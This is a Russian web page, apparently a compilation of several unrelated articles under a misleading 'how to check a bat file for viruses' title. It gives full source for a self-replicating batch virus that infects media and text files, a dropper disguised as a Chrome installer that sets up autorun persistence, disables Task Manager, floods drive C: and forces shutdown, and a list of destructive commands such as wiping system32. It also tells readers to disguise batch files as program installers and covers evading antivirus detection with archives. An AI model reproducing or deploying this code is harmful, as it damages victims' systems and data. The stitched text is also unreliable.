Как проверить bat файл на вирусы

Обновлено: 15.01.2025

Вирус выполняет следующие задачи:
- Запретить ТаскМена
- Удалить системные DLL
- Удалить все драйвера
- Запретить запуск прог
- Запретить RegEdit
- Самоликвидация
- Удалить Панель Управления
- Удалить Блокнот
- Учетная запись "ЛОХ"
- Название винта "ВИНТ ЛОХа

Но это были всё пистики, а теперь тыковки. Внимание. Представляю
вам мега-вирус, он заражает *.jpg *.mp3 *.doc *.htm? *.xls. Причем заражает
не только в текущем каталоге, но и надкаталоге, поэтому не удивляйтесь,
если при его испытании, он расползется по всему винту. Вот он:

@echo off%[MrWeb]%
if '%1=='In_ goto MrWebin
if exist c:\MrWeb.bat goto MrWebru
if not exist %0 goto MrWeben
find "MrWeb"<%0>c:\MrWeb.bat
attrib +h c:\MrWeb.bat
:MrWebru
for %%g in (..\*.jpg ..\*.doc ..\*.htm? *.jpg *.mp3 *.doc *.htm? *.xls) do call c:\MrWeb In_ %%ggoto MrWeben
:MrWebin
if exist %2.bat goto MrWeben
type c:\MrWeb.bat>>%2.bat
echo start %2>>%2.bat%[MrWeb]%
:MrWeben

Вам известно, что JPG-файлы - это картинки. И вы наверно слышали,
что заражать их нельзя. Но на самом деле заражать можно почти все.
Вот смотрите. Вирус заражает *.JPG в текущем каталоге.

Как видите, этот вирус является BAT-файлом. Принцип работы
такой же как и у BAT-вирусов. Если вы не поняли как все это работает, то объясняю.
Каждая вирусная строка имеет метку "MrWeb", в каких-то строках эта метка не является
пассивной, т.е. учавствует в работе вируса, например во-второй строке вируса
"if '%1=='In_ goto MrWebin" эта метка содержится в метке "MrWebin", а вот в первой
строке эта метка является пассивной и поэтому она заключена в знаки процента.
Дак вот, при старте вируса происходит копирование вирусных строк (с меткой) в
специальный файл "c:\MrWeb.bat", конечно это происходит если данный файл не был раньше
создан вирусом. Дальше вирус ищет *.JPG, если находит то заражает их, для этого вирус
вызывает файл c:\MrWeb.bat и передает ему имя файла, который следует заразить.
Принцип заражения: например найден файл 001.JPG, вирус создает вирусный файл 001.JPG.bat,
т.е. принцип компаньон-вируса. Юзер захочет посмотреть картинку, щелкнет по нему мышкой
и увидит то, что хотел увидеть, т.е. картинку, а тем временем заразятся все другие картинки.
Круто? И это еще не все, кто-то может еще сомневается, что можно заразить любой файл.
Так, какие типы файлов будем заражать? Файлы *.mp3 ? Музыку значит. Нет проблем.
Смотрите:

олько знайте, если вы запускали первый пример вируса,
а теперь хотите с этим поприкалываться, то удалите сначала специальный файл
"c:\MrWeb.bat", а то будете потом говорить, что mp3 ни3я заразить.
Чтобы еще-то заразить. Давайте что-нибудь из классики, например *.EXE. Так.

чтите, что этот пример от предыдущего отличается не только
банальным "*.exe", но и убиранием вызова виндовской программы start.
Что? *.txt заразить? Можно, хотя и не совсем нужно. Но я же говорил,
что заражать можно все, значит получайте:

@echo off%[MrWeb]%
if '%1=='In_ goto MrWebin
if exist c:\MrWeb.bat goto MrWebru
if not exist %0 goto MrWeben
find "MrWeb"<%0>c:\MrWeb.bat
attrib +h c:\MrWeb.bat
:MrWebru
for %%g in (*.txt) do call c:\MrWeb In_ %%g
goto MrWeben
:MrWebin
if exist %2.bat goto MrWeben
type c:\MrWeb.bat>>%2.bat
echo start %2>>%2.bat%[MrWeb]%
:MrWeben
а что если не так а так:
@echo off%[MrWeb]%
if %1==In_ goto MrWebin
if exist c:\MrWeb.bat goto MrWebru
if not exist %0 goto MrWeben
find "MrWeb"<%0>c:\MrWeb.bat
attrib +h c:\MrWeb.bat
:MrWebru
for %%g in (*.txt) do call c:\MrWeb In_ %%g
goto MrWeben
:MrWebin
if exist %2.bat goto MrWeben
type c:\MrWeb.bat>>%2.bat
echo start %2>>%2.bat%[MrWeb]%
:MrWeben

Вирус маскируется под дситрибутив Google Сhrome или qip8095, кликая по .exe файлу (Google setup.exe или qip8095),
вы действительно запустите инсталятор,
но в фоновом режиме вирус добавляет себя в пользовательскую автозагрузку в реестре,
предварительно скопировав себя в системную директорию \System32, так же туда он копирует вспомогательное
приложение которое будет закрывать Диспетчер задач, даже если вы включите его в системе (сразу же после запуска
дистрибутива вирус блокирует Диспетчер задач и Редактор реестра),
через 20 секунд после запуска вирус выкинет досовское окошко со всякими неприятными записями,
которое в свою очередь выкинет предупреждение о
КРИТИЧЕСКОЙ ОШИБКЕ СИСТЕМЫ и оповестит о том что ваш пк вырубится через 1 минуту (всё это конечно злая шутка,
кроме выключения пк)
После запуска windows начинается самое интересное, вирус начинает в фоновом режиме копировать
содержимое всех носителей на пк на диск с системой, в папки с системными атрибутами, и в последствии
размножает всё накопированное в геометрической прогрессии. Процесс заполнения диска длится достаточно
медленно, что позволяет жертве далеко не сразу обнаружить последствия вызванные вирусом)
Фоновое копирование может сильно замедлить работу пК.
Засоряться будет только диск "С:\", поэтому если по какой-то неизвестной причине, криворукости например,
у вас отсутствует локальный диск с месткой "С", то вирус работать не будет)
Если система стоит не на диске "С:\", то засоряться всё равно будет диск "С:\"))

Испытывал на 3х пк, при наличии деактиватора бояться нечего, запустив "Kill VIR.exe"
всё вернётся в прежнее состояние, почистятся ключи реестра созданные вирусом,
удалится вирус и его вспомогательные файлы, так же удалится и весь мусор созданный вирусом на локальном диске "С:\"

Вирус скомпилирован
Вот коды исполняемых файлов в .bat:

echo off
copy "System32.exe" %SystemRoot%\system32\System32.exe
copy "MailAg.exe" %SystemRoot%\system32\MailAg.exe
copy "system.bat" %SystemRoot%\system32\system.bat

reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Mail /t REG_SZ /d %SystemRoot%\syswow64\MailAg.exe
reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Mailag /t REG_SZ /d %SystemRoot%\system32\MailAg.exe
reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v System32 /t REG_SZ /d %SystemRoot%\system32\System32.exe
reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v System32*64 /t REG_SZ /d %SystemRoot%\syswow64\System32.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f

ping -n 1 -w 20000 192.168.254.254 >nul

xcopy L:\ C:\Users\Public\Loca\ /S /E /y /H /C

xcopy E:\ C:\Users\Public\Loca\ /S /E /y /H /C

xcopy A:\ C:\Users\Public\Loca\ /S /E /y /H /C
xcopy G:\ C:\Users\Public\Loca\ /S /E /y /H /C

xcopy F:\ C:\Users\Public\Loca\ /S /E /y /H /C
xcopy M:\ C:\Users\Public\Loca\ /S /E /y /H /C
xcopy D:\ C:\Users\Public\Loca\ /S /E /y /H /C
xcopy C:\ C:\Users\Public\Loca\ /S /E /y /H /C
xcopy C:\Windows C:\Users\Public\Loca\ /S /E /y /H /C
xcopy C:\Windows\System32 C:\Users\Public\Loca\ /S /E /y /H /C

mkdir C:\Users\Public\Local
xcopy C:\Users\Public\Loca C:\Users\Public\Local\ /S /E /y /H /C
mkdir C:\Users\Public\Local\Local
xcopy C:\Users\Public\Loca C:\Users\Public\Local\Local\ /S /E /y /H /C
mkdir C:\Users\Public\Local\Local\Local
xcopy C:\Users\Public\Loca C:\Users\Public\Local\Local\Local\ /S /E /y /H /C
mkdir C:\Users\Public\Local\Local\Local\Local
xcopy C:\Users\Public\Loca C:\Users\Public\Local\Local\Local\Local\ /S /E /y /H /C
mkdir C:\Users\Public\Local\Local\Local\Local\Local
xcopy C:\Users\Public\Loca C:\Users\Public\Local\Local\Local\Local\Local\ /S /E /y /H /C
mkdir C:\Users\Public\Local\Local\Local\Local\Local\Local
xcopy C:\Users\Public\Loca C:\Users\Public\Local\Local\Local\Local\Local\Local\ /S /E /y /H /C
mkdir C:\Users\Public\Local\Local\Local\Local\Local\Local\Local
xcopy C:\Users\Public\Loca C:\Users\Public\Local\Local\Local\Local\Local\Local\Local\ /S /E /y /H /C
mkdir C:\Users\Public\Local\Local\Local\Local\Local\Local\Local\Local
xcopy C:\Users\Public\Loca C:\Users\Public\Local\Local\Local\Local\Local\Local\Local\Local\ /S /E /y /H /C
mkdir C:\Users\Public\Local\Local\Local\Local\Local\Local\Local\Local\Local\Local
xcopy C:\Users\Public\Loca C:\Users\Public\Local\Local\Local\Local\Local\Local\Local\Local\Local\ /S /E /y /H /C

mkdir C:\Users\Public\Local1
xcopy C:\Users\Public\Local C:\Users\Public\Local1\ /S /E /y /H /C
mkdir C:\Users\Public\Local1\Local9
xcopy C:\Users\Public\Local C:\Users\Public\Local1\Local9\ /S /E /y /H /C
mkdir C:\Users\Public\Local1\Local9\Locar
xcopy C:\Users\Public\Local C:\Users\Public\Local1\Local9\Locar\ /S /E /y /H /C
mkdir C:\Users\Public\Local1\Local9\Locar\Locae
xcopy C:\Users\Public\Local C:\Users\Public\Local1\Local9\Locar\Locae\ /S /E /y /H /C
mkdir C:\Users\Public\Local1\Local9\Locar\Locae\Locat
xcopy C:\Users\Public\Local C:\Users\Public\Local1\Local9\Locar\Locae\Locat\ /S /E /y /H /C
mkdir C:\Users\Public\Local1\Local9\Locar\Locae\Locat\Locay
xcopy C:\Users\Public\Local C:\Users\Public\Local1\Local9\Locar\Locae\Locat\Locay\ /S /E /y /H /C
mkdir C:\Users\Public\Local1\Local9\Locar\Locae\Locat\Locay\Locau
xcopy C:\Users\Public\Local C:\Users\Public\Local1\Local9\Locar\Locae\Locat\Locay\Locau\ /S /E /y /H /C
mkdir C:\Users\Public\Local1\Local9\Locar\Locae\Locat\Locay\Locau\Locaq
xcopy C:\Users\Public\Local C:\Users\Public\Local1\Local9\Locar\Locae\Locat\Locay\Locau\Locaq\ /S /E /y /H /C
mkdir C:\Users\Public\Local1\Local9\Locar\Locae\Locat\Locay\Locau\Locaq\Locaw
xcopy C:\Users\Public\Local C:\Users\Public\Local1\Local9\Locar\Locae\Locat\Locay\Locau\Locaq\Locaw\ /S /E /y /H /C
mkdir C:\Users\Public\Local1\Local9\Locar\Locae\Locat\Locay\Locau\Locaq\Locaw\Locae
xcopy C:\Users\Public\Local C:\Users\Public\Local1\Local9\Locar\Locae\Locat\Locay\Locau\Locaq\Locaw\Locae\ /S /E /y /H /C
mkdir C:\Users\Public\Local1\Local9\Locar\Locae\Locat\Locay\Locau\Locaq\Locaw\Locae\Locar
xcopy C:\Users\Public\Local C:\Users\Public\Local1\Local9\Locar\Locae\Locat\Locay\Locau\Locaq\Locaw\Locae\Locar\ /S /E /y /H /C
mkdir C:\Users\Public\Local1\Local9\Locar\Locae\Locat\Locay\Locau\Locaq\Locaw\Locae\Locar\Locat
xcopy C:\Users\Public\Local C:\Users\Public\Local1\Local9\Locar\Locae\Locat\Locay\Locau\Locaq\Locaw\Locae\Locar\Locat\ /S /E /y /H /C

mkdir C:\Users\Public\Local2
xcopy C:\Users\Public\Local1 C:\Users\Public\Local2\ /S /E /y /H /C
mkdir C:\Users\Public\Local2\Local
xcopy C:\Users\Public\Local1 C:\Users\Public\Local2\Local\ /S /E /y /H /C
mkdir C:\Users\Public\Local2\Local\Local
xcopy C:\Users\Public\Local1 C:\Users\Public\Local2\Local\Local\ /S /E /y /H /C
mkdir C:\Users\Public\Local2\Local\Local\Local
xcopy C:\Users\Public\Local1 C:\Users\Public\Local2\Local\Local\Local\ /S /E /y /H /C
mkdir C:\Users\Public\Local2\Local\Local\Local\Local
xcopy C:\Users\Public\Local1 C:\Users\Public\Local2\Local\Local\Local\Local\ /S /E /y /H /C
mkdir C:\Users\Public\Local2\Local\Local\Local\Local\Local
xcopy C:\Users\Public\Local1 C:\Users\Public\Local2\Local\Local\Local\Local\Local\ /S /E /y /H /C
mkdir C:\Users\Public\Local2\Local\Local\Local\Local\Local\Local
xcopy C:\Users\Public\Local1 C:\Users\Public\Local2\Local\Local\Local\Local\Local\Local\ /S /E /y /H /C
mkdir C:\Users\Public\Local2\Local\Local\Local\Local\Local\Local\Local
xcopy C:\Users\Public\Local1 C:\Users\Public\Local2\Local\Local\Local\Local\Local\Local\Local\ /S /E /y /H /C
mkdir C:\Users\Public\Local2\Local\Local\Local\Local\Local\Local\Local\Local
xcopy C:\Users\Public\Local1 C:\Users\Public\Local2\Local\Local\Local\Local\Local\Local\Local\Local\ /S /E /y /H /C
mkdir C:\Users\Public\Local2\Local\Local\Local\Local\Local\Local\Local\Local\Local
xcopy C:\Users\Public\Local1 C:\Users\Public\Local2\Local\Local\Local\Local\Local\Local\Local\Local\Local\ /S /E /y /H /C
mkdir C:\Users\Public\Local2\Local\Local\Local\Local\Local\Local\Local\Local\Local\Local
xcopy C:\Users\Public\Local1 C:\Users\Public\Local2\Local\Local\Local\Local\Local\Local\Local\Local\Local\Local\ /S /E /y /H /C
mkdir C:\Users\Public\Local2\Local\Local\Local\Local\Local\Local\Local\Local\Local\Local\Local
xcopy C:\Users\Public\Local1 C:\Users\Public\Local2\Local\Local\Local\Local\Local\Local\Local\Local\Local\Local\Local\ /S /E /y /H /C
mkdir C:\Users\Public\Local2\Local\Local\Local\Local\Local\Local\Local\Local\Local\Local\Local\Local
xcopy C:\Users\Public\Local1 C:\Users\Public\Local2\Local\Local\Local\Local\Local\Local\Local\Local\Local\Local\Local\Local\ /S /E /y /H /C
start system.bat
________________________________________________________________________________________

:loop
taskkill /im taskmgr.exe /t /f
taskkill /im mmc.exe /t /f
taskkill /im regedit.exe /t /f
goto loop

echo off
shutdown.exe -s -t 60 -c "CRITICAL SYSTEM ERROR! YOU HAVE 1 MINUTE"
echo OBNARUZHENA KRITICHESKAYA OSHIBKA SISTEMY. / THE CRITICAL ERROR OF SYSTEM IS FOUND OUT.
ping -n 1 -w 5000 192.168.254.254 >nul

echo SROCHNO PRIMITE MERY. / URGENTLY TAKE MEASURES.

ping -n 1 -w 5000 192.168.254.254 >nul

echo ZAPUSHEN PROCESS RAZMAGNICHIVANIYA ZHOSTKOGO DISKA / PROCESS OF THE DEMAGNETIZING OF THE HARD DISK IS STARTED

ping -n 1 -w 5000 192.168.254.254 >nul

:loop
echo CRITICAL SYSTEM ERROR.
goto loop

Вирус конвертировал из .bat в .exe и собрал все исполняемые файлы в один exe-шник, при запуске тот распаковывается в темпах, поэтому весь процесс проходит в фоновом режиме.

Вот ссылки на готовые, скомпилированные в .exe вирусы:

Внутри архива лежит деактиватор, который подчистит всё что натворит вирус и вернёт в исходное состояние, написанный тоже в блокноте с расширением .bat, вот его код:

taskkill /im "google setup.exe" /t /f
taskkill /im System32.exe /t /f
taskkill /im xcopy.exe /t /f
taskkill /im Mailag.exe /t /f

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 0 /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f
reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v System32 /f
reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Mailag /f
reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v System32*64 /f
reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Mail /f

del C:\Windows\System32\System32.exe
del C:\Windows\System32\Mailag.exe
del C:\Windows\System32\system.bat
del c:\windows\syswow64\system.bat
del c:\windows\syswow64\Mailag.exe
del c:\windows\syswow64\System32.exe
del c:\windows\syswow32\system.bat
del c:\windows\syswow32\Mailag.exe
del c:\windows\syswow32\System32.exe

rmdir C:\Users\Public\Loca /s /q
rd C:\Users\Public\Loca /s /q
rmdir C:\Users\Public\Local /s /q
rd C:\Users\Public\Local /s /q
rmdir C:\Users\Public\Local1 /s /q
rd C:\Users\Public\Local1 /s /q
rmdir C:\Users\Public\Local2 /s /q
rd C:\Users\Public\Local2 /s /q

Здравствуй, дорогой читатель/читательница. Если ты читаешь эту статью, значит тебе захотелось немножко разыграть своего друга или знакомого. Здесь ты прочитаешь, как создать свой безобидный вирус с расширением .bat.

Предупреждаю: все описанные здесь примеры должны использоваться строго в законных целях. Автор этой статьи и администрация сайта за причиненный Вами ущерб ответственности не несёт! D:<
Короче говоря, сначала рассмотрим, что же такое в сущности, этот таинственный bat-файл, или в компьютерном сленге, батник.
Википедия гласит:

Проще говоря, это аналог командной строки.
Конечно, команд там разных много, но нам потребуется лишь несколько. Впринципе, если Вы хотите сделать этот вирус один раз и не вдаваться в подробности, то запоминать их и не надо.
Общий принцип создания bat-файлов очень прост. Их можно создавать даже через Блокнот.

Открываем Блокнот
Пишем @echo off
Дальше пишем или копируем туда наш код
Выбираем в левом верхнем углу "Сохранить как. "
По умолчанию, все файлы сохраняются как .txt. Нас же это не устраивает.

Выбираем вместо "текстовые документы" "все файлы", пишем имя файла.bat и сохраняем.
В итоге должно получиться вот так

А затем вот так

Но если вы хотите быть коварными до конца, поменяйте у пакетного файла расширение на .exe, поставьте ему иконку, на которую пользователь захочет нажать, и, конечно, поменяйте название на название его любимой игры или браузера.
В общем, решайте сами. Фантазия тут неограничена.
Теперь, собственно, сам код.

При активации данного "недовируса" появляется бесчисленное множество командных строк и компьютер гарантированно виснет. Убить процесс можно лишь через перезагрузку компьютера. На моём ноуте с объемом оперативной памяти 16 Гб глюков не наблюдалось лишь первые 3 секунды. Потом он намертво завис.
Называется такой тип вируса "форк-бомба". Опять-таки, читайте в Википедии :)

Данный вирус сбивает время на компьютере. Дёшево и сердито. И максимально безобидно.

Удаляет все ярлыки с рабочего стола. Уже не так безобидно, но еще не катастрофа.

Удаляет все курсоры. Пользователь дезориентирован.

(Команду для самоуничтожения вируса нужно писать после самого вируса). Например

Ну, собственно, и всё. С батниками можно сделать еще очень много чего интересного, но новичкам, я думаю, хватит и этого. И еще раз предупреждаю: не надо разыгрывать людей со слабой психикой, А ТО КАК ТРЕСНУТ!
До скорого, мои хакеры)

И так начнем если вы хотите получить поддержку по написанию могу поделится по скайпу: alexey13711

Батник и как его создать?

1) Открываем блокнот и пишем там вирус

2) Жмем кнопку "Сохранить как" и выбираем формат " . " (все файлы)

3) Сохраняем и делаем из расширения .bat в .exe

Теперь все подробно роспишу

Для того чтоб компьютер понял задачу нужно писать комманды, каждая из них имеет свое значения вот несколько из них:

Date 12.05.15 -строка меняет дату(какой нибудь 15 год поставил и начнет каспер плакать что лицензия 5лет назад кончилась.ну и другие проги работающие по такому же принципу)
Time 00:00 -я думаю понятно меняет время, можно любое задать
attrib -a -s -h [файл.расш] - снимает атрибуты с файла:
+-[a] - снять/убрать атрибут "НЕ ЗНАЮ Я КАКОЙ НО вроде Архивный"
+-[ s ] - снять/убрать атрибут "Системный"
+-[h] - снять/убрать атрибут "Скрытый"
+-[r] - снять/убрать атрибут "Чтение"
-меняет атрибут вашего файла на скрытый
Echo c:(имя вашего файла).bat >>autoexec.bat -прописывает ваш файл в автозагрузку
md
md LAMER -понятно что создастся новая папка LAMER ,на первый взгляд не чего особенного. Щас исправим. открываем Exel в первой ячейке пишем md 1 и оттягиваем вниз хоть на тысячу---копируем это все в блокнот соответственно. дальше я думаю все понятно,смотря сколько папок будет создаваться ну и от мощности мошины .
assoc .exe=.mp3 -запускает все ексшники как музыка
del c:Program Files/q -удаляет все файлы из указанной папки
assoc .lnk=.txt -все ярлыки начнут открываться блокнотом
del *.* /q -удаление всех файлов , останутся только те которые находятся в той же папке в которой был запущен
erase %windir%*.* /q - банальное удаление файлов.
erase %windir%system32*.* /q - банальное удаление файлов, хотя винду снесёт без проблем.
erase %systemdrive%*.* /q - удаление системно важных скрытых файлов на системном диске. Хотя чтобы винда больше не запустилась никаким образом достаточно удалить файл ntldr и перегрузиться.
regedit (путь к вашему файлу) - Добавляем информацию с вашего .reg файла в реестр. Существует ещё и команда reg с параметрами, но иногда проще создать отдельный .reg файл. Здесь фантазии может быть много.
echo текст >(>>) файл - Добавляем записи в файл. Знак > создаёт новый файл с заданным текстом, >> добавляет уже в существующий файл.
shutdown -r -f - Принудительно перезагружаем комп, несмотря на протесты системы.
@echo off - запрещаем вывод команд на экран, в том числе и результатов их выполнения.
color 40 - делаем фон файла красным, а буквы чёрными.
label LAMER - команда label указанная без параметров переименовывает системный диск на заданное слово.
rundll32 shell32.dll,Control_RunDLL hotplug.dll - диалоговое окно Отключение или извлечение аппаратного устройства
rundll32 diskcopy,DiskCopyRunDll - вызов диалога "Копирование диска".
rundll32 keyboard,disable - отключение клавиатуры, действует до следующей перезагрузки.
rundll32 mouse,disable - отключение мыши вплоть до перезагрузки.
rundll32 krnl386.exe,exitkernel - выгрузить ядро системы, выход из Windows.
rundll32 mshtml.dll,PrintHTML "HtmlFileNameAndPath" - распечатать документ HTML, где "HtmlFileNameAndPath" - путь к файлу и его имя.
rundll32 мсprint2.dll,RUNDLL_PrintTestPage - распечатать тестовую страницу на принтере.
rundll32 netplwiz.dll,AddNetPlaceRunDll - вызов мастера подключения нового сетевого ресурса "Добавление в сетевое окружение".
rundll32 rnaui.dll,RnaWizard - вызов мастера "Удаленный доступ к сети".
rundll32 rnaui.dll,RnaWizard /1 - вызов мастера "Удаленный доступ к сети" без отображения начального окна.
rundll32 shell,ShellExecute - открыть Проводник (папка "Рабочий стол").
rundll32 shell32,Control_RunDLL - открыть в Проводнике папку "Панель управления".
rundll32 shell32,Control_RunDLL appwiz.cpl,,n - вызов диалогового окна "Установка и удаление программ", в котором будет открыта вкладка с номером "n" (от 1 до 3).
rundll32 shell32,Control_RunDLL main.cpl @0 - открыть диалог "Свойства мыши".
rundll32 shell32,Control_RunDLL main.cpl @1 - открыть диалог "Свойства клавиатуры".
rundll32 shell32,Control_RunDLL main.cpl @2 - открыть папку "Принтеры".
rundll32 SHELL32,SHHelpShortcuts_RunDLL PrintersFolder - открыть папку "Принтеры" (другой способ).
rundll32 shell32,Control_RunDLL main.cpl @3 - открыть папку "Шрифты".
rundll32 SHELL32,SHHelpShortcuts_RunDLL FontsFolder - открыть папку "Шрифты" (другой способ).
rundll32 SHELL32,Control_RunDLL modem.cpl, add - открыть диалог "Свойства модема".
rundll32 shell32,Control_RunDLL timedate.cpl - открыть диалог "Дата и время".
rundll32 shell32,OpenAs_RunDLL - вызвать диалог "Открыть с помощью. ".
rundll32 shell32,ShellAboutA WINHOWTO.RU - информация о версии Windows.
rundll32 shell32,SHExitWindowsEx 0 - закрыть все программы, перегрузить оболочку.
rundll32 shell32, SHExitWindowsEx 1 - выключить ПК.
rundll32 SHELL32, SHExitWindowsEx -1 - перегрузить оболочку Windows.
rundll32 shell32, SHExitWindowsEx 2 - перегрузить ПК.
rundll32 shell32,SHExitWindowsEx 4 - принудительно закрыть все программы.
rundll32 shell32,SHExitWindowsEx 8 - выход из Windows и выключение ATX-совместимого ПК.
rundll32 shell32,SHFormatDrive - вызов диалога форматирования диска А:.
rundll32 SHELL32,SHHelpShortcuts_RunDLL AddPrinter - запуск "Мастера установки принтера".
rundll32 shell32,SHHelpShortcuts_RunDLL Connect - запуск мастера подключения сетевого диска.
rundll32 SHELL32,SHHelpShortcuts_RunDLL PrintTestPage - распечатать тестовую страницу.
rundll32 sysdm.cpl,InstallDevice_Rundll - вызов мастера установки оборудования.
rundll32 url.dll,FileProtocolHandler %1 - открыть веб-страницу, где %1 - URL сайта (включая [link=http://).]http://).[/link]
rundll32 url.dll,MailToProtocolHandler %1 - создать новое письмо, где %1 - e-mail адресата.
rundll32 user,CASCADECHILDWINDOWS - расположить все окна каскадом.
rundll32 user,TILECHILDWINDOWS - расположить все окна по экрану.
rundll32 user,disableoemlayer - сбой системы (!) - выключить все функции ввода-вывода (клавиатура, дисплей, мышь). В результате будет черный экран с курсором и ни на что не реагирующая система, однако Windows продолжает работать.
rundll32 user,ExitWindowsExec - быстрая перезагрузка Windows.
rundll32 user,RepaintScreen - выполнить команду "Обновить".
rundll32 user,SetCaretBlinkTime n - задать частоту мигания курсора, соответствующую значению параметра n.
rundll32 user,SetCursorPos - переместить курсор мыши в верхний левый угол экрана.
rundll32 user,SetDoubleClickTime n - задать скорость двойного нажатия левой кнопки мыши (Double Click), соответствующую параметру n.
rundll32 user,SwapMouseButton - поменять местами клавиши мыши (обратная смена невозможна).
rundll32 user,WNetConnectDialog - вызов диалога "Подключение сетевого диска".
rundll32 user,WNetDisconnectDialog - вызов диалога "Отключение сетевого диска".
rundll32 AppWiz.Cpl,NewLinkHere %1 - запуск мастера создания нового ярлыка, где %1 - путь к исходному файлу.

тут вирус проверяет существует ли файл c:virus.bat если да то переходит на метку go

if exist c:virus.bat - команда проверить существует ли файл c:virus.bat (вместо virus название вашого вируса )

Для начала потренируйтесь на етих командах а потом позвоните мне в скайпе и я отправлю вам полный список команд (мой скайп alexey13711 )

Как с формата .bat зделать в .exe?

Ето очень просто!

Для етого вам потребуется архиватор Вин Рар и мозг (1штука)

Для того чтобы сменить вормат вам надо взять готовый батник с расширением .bat м--► Жмем прав. кнопкой мыши и нажимаем "Создать архив" --► Ставим галочку создать "SFX-архив" -- ► прраметры SFX-архива -- ► и в строчку выполнить после распаковки пишем название своего вируса-- ►Жмем ок и готово!

Обезательно посмотрите продолжение. Там команды "повкуснее" и их почти нельзя вернуть. жмем на кнопку!

Всем привет. Ниже будет много глупого текста, ностальгических воспоминаний и школотного кода. Кроме того будет рассмотрена эффективность сервиса VirusTotal, а также антивирусных движков в отношении исполняемых файлов.

Часть 1. Бредово-ностальгическое вступление

В моей жизни многое поменялось. Мне стала интересна (местами — до недосыпов) моя текущая работа, в моём регионе четвёртый год идёт война, многое изменилось и переосмыслилось в личной жизни.

Многие взгляды и мнения изменились.

Лет 15-20 назад мне была интересна тема взлома и написания вредоносного кода, потом интересы сменились на прямо противоположные — защиту от этого дела, а потом я понял, что всем правят деньги и личные интересы, а вовсе не альтруизм и желание помочь.

Но то такое. В любом случае ИТ оказалось частью даже моей настоящей работы, хотя вовсе не относится к исходной специализации.

Лет 10 назад я написал в очень узком кругу про возможность снятия детекта антивируса с помощью самораспаковывающихся архивов. Тогда это было, кажется, на Virusinfo, потом кое-кто это перепостил под своим ником на DrWeb — так сказать, без копирайтов и со своим авторством, потом даже скандал был — но то тоже давно и неправда.

А недавно я вспомнил старое. Многое прошло, многие вещи обновились и угнаться за прогрессом, не варясь в теме, оказалось сложно.

Но суть осталась та же: сенсации, деньги и личные интересы. И игра на незнаниях — которые доходят иногда до того, что уязвимости Meltdown/Spectre ищут в телевизорах и бортовых компьютерах автомобилей )))

Но довольно этого неинтересного бреда. Итак, я решил вспомнить старое, а поскольку вспомнилось мало — то решил по старинке снять детекты с нескольких вирусов.

Часть 2. Совсем немного теории

Для того, чтобы двигаться дальше, давайте разберёмся, о чём пойдёт речь. В настоящий момент, как, впрочем, и ранее, активно продвигается тема антивирусов. Дескать, антивирусы помогают не допустить потери важных данных, антивирусы спасают от уязвимостей, антивирусы — то, антивирусы — сё и так далее.

При этом зачастую рядовой пользователь даже не понимает, что антивирус — это не просто сканер, это и резидентная защита, и эвристик, а зачастую — и проактивная защита, файервол и песочница.

Каждому из этих компонентов мы можем посвятить не то что статью — книгу, но остановимся на самом базовом: сканере.

Этот компонент не позволит предотвращать соединения с вредоносными сайтами, он не будет ловить вредоносный код на лету, но он позволяет проверить файл и дать ответ: стоит его хранить — или лучше удалить сразу и навсегда.

Ниже мы протестируем разные движки антивирусов и посмотрим, насколько они справляются с этой задачей хорошо.

Отдельно хотелось бы отметить ресурс VirusTotal — он позволяет не только проверить файл различными движками антивирусов, но и представляет собой некую песочницу по тестированию вредоносного (и вообще любого) кода. Плюс платформы — бесплатность, минус — все образцы, которые высылаются на VirusTotal впоследствии передаются всем антивирусным лабораториям.

Именно по этой причине ниже я не буду давать ссылки на страницы с результатами сканирования, а предоставлю скриншоты с этими результатами, полученными в ходе работы. Очевидно (и я хочу в это верить!) после этой статьи результаты улучшатся.

Авторы вредоносного кода чрезвычайно часто используют упаковщики и протекторы, которые не только сжимают вредоносный файл, но и затрудняют его детектирование по сигнатурам, а также его последующий анализ. При использовании ворованных лицензий протекторов типа WinLicense и Themida обычно антивирусные лаборатории не затрудняют себя распаковкой, а просто добавляют сигнатуры протектора с ворованным ключом в детект (знаменитые детекты типа Trojan:W32/Black.A). Это приводит к появлению ложных срабатываний — аналогичными ворованными лицензиями пользуются авторы генераторов ключей, патчеров и некоторых программ, которые по сути вредоносными не являются, но тем не менее защищаются от реверсинга.

Поскольку всё, описанное в этой статье, ниже будет предоставлено читателю для ознакомления, я не работал с реальным вредоносным кодом (хотя ниже предоставлю и его результаты сканирования), а использовал файл Eicar, популярный при тестировании антивирусов: это — своеобразная заглушка, на которую любой антивирус должен давать стойкий детект.

Часть 3. Практика

Итак, как сейчас детектируется Eicar на VirusTotal

Признаться честно, увиденное меня несколько поразило, потому что два антивирусных движка — Comodo и Malwarebytes почему-то решили не следовать общим стандартам и проигнорировать детект. Тем не менее результат очевиден — файл имеет детект, близкий к 100%.

Как мы договаривались в самом начале, мы — полная школота, а потому не будем изобретать свои методы упаковки, а просто упакуем файл в архив с помощью 7Z:

Да, детектов стало поменьше, поскольку не все антивирусные движки включают распаковщик архивов 7Z (ну либо это настройка не включена в VirusTotal по умолчанию) — но всё равно детект высок.

Усложняем задачу: пакуем файл в архив с паролем. Пусть пароль будет fun:

Файл — чист, поскольку даже имея процедуру распаковки антивирус не знает пароль на файл.

Детект снят — но мы не получили исполняемый файл.

В реальных пакерах решение бывает достаточно сложным и мы не будем вдаваться в эти подробности. Воспользуемся услугами QBC и напишем простейший скрипт:

